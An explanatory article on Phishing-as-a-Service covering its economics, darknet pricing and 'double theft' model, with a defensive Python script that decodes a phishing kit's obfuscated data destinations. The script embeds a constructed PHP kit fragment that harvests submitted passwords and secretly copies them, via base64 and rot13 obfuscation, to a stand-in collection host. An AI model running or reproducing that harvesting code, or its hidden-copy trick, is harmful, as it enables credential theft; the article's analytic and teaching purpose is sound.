Phishing as a Service (PHaaS)

Phishing is a common way for cybercriminals to dupe people through socially-engineered emails into giving up their credentials to online accounts that can store sensitive data. 

Phishers use these emails, which often fool people by impersonating a trusted company, application or institution, to direct victims to specially crafted phishing sites where they enter their credentials, believing they are doing so for a legitimate reason.

Phishing is often a gateway into other criminal activity: phishers sell the credentials harvested in their campaigns on the dark web, and ransomware gangs, among others, use those credentials as an initial entry point into networks.


The challenges of Phishing-as-a-Service

Phishing-as-a-Service (PHaaS) is an inclusive form of cybercrime, potentially opening the door for everyone. Now, even a novice can have their own phishing campaign.

In fact, one of the main obstacles to entering the world of cybercrime has been technical.

In the past, you had to build your own "hand-made" scam end to end: writing the code (including any malware), hosting the spoofed landing pages, and selling the collected data.

That was a slow, painstaking and labour-intensive process, consisting of the following steps:

Designing the scam itself

This includes identifying the targets, choosing the best brands to impersonate, deciding how the phishing cycle will work (link, attachment, etc.), and deciding what to do with the collected data.

Phishing email design and development

Including setting up email servers, writing content, creating malicious links or attachments.

Creation of the spoof website

Phishing often involves deceiving a person into revealing details such as personal data or financial information.

A forged login page may also be required to collect authentication credentials.

Consumption and use of collected data

The final step, where you decide what to do with the phished data: sell it through a darknet marketplace or a messaging-app group, or use it to hijack accounts yourself.

Phishing-as-a-Service is therefore a turning point in the world of cybercrime because it removes a number of the aforementioned steps, especially difficult ones such as hosting and design.

The cybercriminal apprentice will no longer have to hack websites to host their malicious landing pages.

Therefore, by using a phishing option as a ready-made service, cybercrime becomes accessible to everyone.


How Phishing-as-a-Service works

There is a mix of phishing kits from individual tools to fully orchestrated campaigns, available for rent on the darknet.

It is the latter category that constitutes phishing as a full-fledged service. Prices for kits and services start at around $50 for a simple one-time kit download.

More complicated phishing services, such as Phishing-as-a-Service, have prices ranging from $50 to $80 per month for rental.

Phishing-as-a-Service generally works as a subscription model, similar to renting any other online service such as streaming TV.

This model allows novice users to use professional phishing tools at an affordable price.

Anyone wishing to purchase the tools will go to a marketplace (on the darknet) that offers them as packaged products, in much the same way as any other e-commerce site.

You can choose between different product variants, add them to your cart and pay, which makes Phishing-as-a-Service easy to use even for non-experts.


The double theft technique in PHaaS

A Phishing-as-a-Service operator earns twice. First from renting out the platform, and second from the stolen credentials themselves: the platform is built so that every email-and-password combination harvested by a renter's campaign is also delivered to the operator, who can then sell or use it in turn. The renter pays for the service and does the work of driving victims to the phishing pages, while the operator keeps a copy of everything collected.

PHaaS differs from traditional phishing kits, which are sold for a single payment as a package of files containing ready-to-use phishing email templates, in that phishing itself is turned into a service: it is sold by subscription, modelled on Software-as-a-Service (SaaS), and expands to include integrated hosting for the spoofed sites, email distribution and credential collection.
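The practical consequence of the "double theft" design is that a kit's credential-collection code usually references more than one destination, and the operator's copy is typically obfuscated so the renter does not notice it. The following script is an added example for this article, not code from any real kit or from the original page: it walks a kit's source tree, decodes inline base64 and rot13 literals, and lists every email address and URL the PHP could deliver data to, flagging those that never appear in the clear. The kit fragment it analyses is constructed here for the demonstration; the file names, addresses and hosts are invented.

```python
"""Static triage of a phishing-kit source tree for data destinations.

Added example for this article. The kit fragment below is constructed for
the demonstration: the renter's result address is in the clear, while the
operator's copy is hidden behind base64 and a rot13-encoded URL.
"""
import base64
import codecs
import os
import re
import tempfile

# The obfuscated literals are computed here so the sample stays consistent.
OPERATOR_B64 = base64.b64encode(b"operator-copy@example.org").decode()
COLLECT_ROT13 = codecs.encode("https://collect.example.org/g", "rot_13")

SAMPLE_KIT = {  # constructed sample, relative path -> PHP source
    "login.php": (
        '<?php\n'
        '$renter_email = "results-dropbox@example.net";\n'
        '$body = "User: ".$_POST["user"]." Pass: ".$_POST["pass"];\n'
        'mail($renter_email, "New Login", $body);\n'
        'include("inc/helper.php");\n'
        'send_copy($body);\n'
        'header("Location: https://bank.example/real-login");\n'
    ),
    "inc/helper.php": (
        '<?php\n'
        'function send_copy($b) {\n'
        f'  $h = base64_decode("{OPERATOR_B64}");\n'
        '  mail($h, "copy", $b);\n'
        f'  $c = curl_init(str_rot13("{COLLECT_ROT13}"));\n'
        '  curl_setopt($c, CURLOPT_POSTFIELDS, $b);\n'
        '  curl_exec($c);\n'
        '}\n'
    ),
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s\"')]+")
B64_CALL_RE = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
ROT13_CALL_RE = re.compile(r'str_rot13\(\s*["\']([^"\']+)["\']\s*\)')


def deobfuscate(src):
    """Return src followed by the plaintext of every inline base64/rot13 literal."""
    extra = []
    for m in B64_CALL_RE.finditer(src):
        try:
            extra.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # not really base64, skip it
            pass
    for m in ROT13_CALL_RE.finditer(src):
        extra.append(codecs.decode(m.group(1), "rot_13"))
    return src + "\n" + "\n".join(extra)


def find_destinations(files):
    """files: {relative path: source}. Returns {email or URL: [paths referencing it]}."""
    hits = {}
    for path, src in files.items():
        text = deobfuscate(src)
        for target in set(EMAIL_RE.findall(text)) | set(URL_RE.findall(text)):
            hits.setdefault(target, []).append(path)
    return hits


def hidden_targets(hits, files):
    """Destinations that appear only after decoding: candidates for the operator's copy."""
    cleartext = "\n".join(files.values())
    return sorted(t for t in hits if t not in cleartext)


def load_kit(root):
    """Read every script-like file under root into {relative path: source}."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith((".php", ".js", ".html", ".txt")):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as f:
                    files[os.path.relpath(full, root)] = f.read()
    return files


def write_sample_kit(root):
    """Materialise the constructed kit under root so load_kit() has files to walk."""
    for rel, src in SAMPLE_KIT.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(src)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_kit(tmp)
        kit = load_kit(tmp)
        found = find_destinations(kit)
        hidden = hidden_targets(found, kit)
        for target, paths in sorted(found.items()):
            flag = "HIDDEN" if target in hidden else "clear "
            print(f"{flag}  {target:35}  {', '.join(paths)}")
```

Run against a real kit, point `load_kit` at the unpacked directory instead of the temporary sample. The listing deliberately includes legitimate references such as the final redirect to the impersonated site, so the analyst still has to judge each entry; the useful signal is any destination that only surfaces after decoding, which is exactly where the operator's copy tends to sit. Real kits use more encodings than base64 and rot13 (hex escapes, gzip, eval chains), so treat the decoders here as a starting point rather than an exhaustive list.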


How to defend yourself?

The best way to protect yourself from phishing attacks is to never click on any links or open any attachments. But this advice isn’t realistic for most people.

Phishing attacks that deliver malware often rely on software bugs to get the malware onto your computer.

Usually, once a bug is found, a software manufacturer will release an update to fix it.

This means that older software has more publicly known bugs that could be used to help install malware.

Keeping your software up to date therefore reduces the risk of malware and is realistic, effective advice. Note, however, that a spoofed login page needs no malware at all to harvest your credentials, so patching alone does not protect you from the credential-theft campaigns that PHaaS platforms are built for.